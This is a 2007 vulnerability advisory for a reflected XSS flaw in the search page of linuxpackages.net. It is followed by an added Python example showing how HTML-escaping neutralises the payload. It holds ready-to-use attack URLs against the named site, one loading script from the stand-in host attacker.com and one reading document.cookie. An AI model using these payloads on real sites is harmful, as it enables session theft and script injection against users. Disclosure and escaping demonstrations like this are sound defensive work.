+ Subject:
XSS bug for www.linuxpackages.net
+ Version:
2007.01.12
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ Linuxpackages.net Description:
This site is dedicated to the enrichment and enhancement of the Slackware Linux operating system.
We are gathering a vast resource of Slackware packages from around the world. We feel that some of the other application sites have become too hard to use and it's hard to find a package just for you. Many times no links to packages are even provided.
+ Description:
XSS IN:
http://www.linuxpackages.net/search_view.php?by=name&name=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fattacker.com%2Fxss.js%3E%3C%2FSCRIPT%3E&ver=
http://www.linuxpackages.net/search_view.php?by=name&name=%22%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&ver=
Posted data:
"><SCRIPT SRC=http://attacker.com/xss.js></SCRIPT>
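Added example (not part of the original advisory, and not the site's code): it decodes the `name` parameter from the second URL above and compares verbatim reflection with HTML-encoded output. The `TEMPLATE` markup is an assumption inferred from the `">` prefix of the payload, and all function names are hypothetical.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Second URL from the advisory (the alert(document.cookie) variant).
ADVISORY_URL = ("http://www.linuxpackages.net/search_view.php?by=name&name="
                "%22%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&ver=")
# Assumed template: the site's real markup is not shown in the advisory.
TEMPLATE = '<form><input type="text" name="name" value="{name}"></form>'

def name_param(url):
    """Return the decoded `name` query parameter, as the server receives it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("name", [""])[0]

def render_unescaped(name):
    """Reflects the parameter verbatim: the behaviour the advisory reports."""
    return TEMPLATE.format(name=name)

def render_escaped(name):
    """Encodes &, <, >, " and ' so the value cannot leave the attribute."""
    return TEMPLATE.format(name=escape(name, quote=True))

class TagCollector(HTMLParser):
    """Records each element the HTML parser sees and any value attributes."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.values.extend(v for k, v in attrs if k == "value")

def parse(html_text):
    collector = TagCollector()
    collector.feed(html_text)
    collector.close()
    return collector

if __name__ == "__main__":
    payload = name_param(ADVISORY_URL)
    print("decoded:", payload)
    print("unescaped tags:", parse(render_unescaped(payload)).tags)
    print("escaped tags:  ", parse(render_escaped(payload)).tags)
```

With encoding applied, the parser sees only the form and input elements, and the search term survives intact as the attribute's value.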
Timeline:
2007.01.12 bug discovered
2007.01.12 "/" bug sent via mail to http://linuxpackages.net
Original Advisory: http://kaneda.bohater.net/security/20070112-xss-linuxpackages.net.php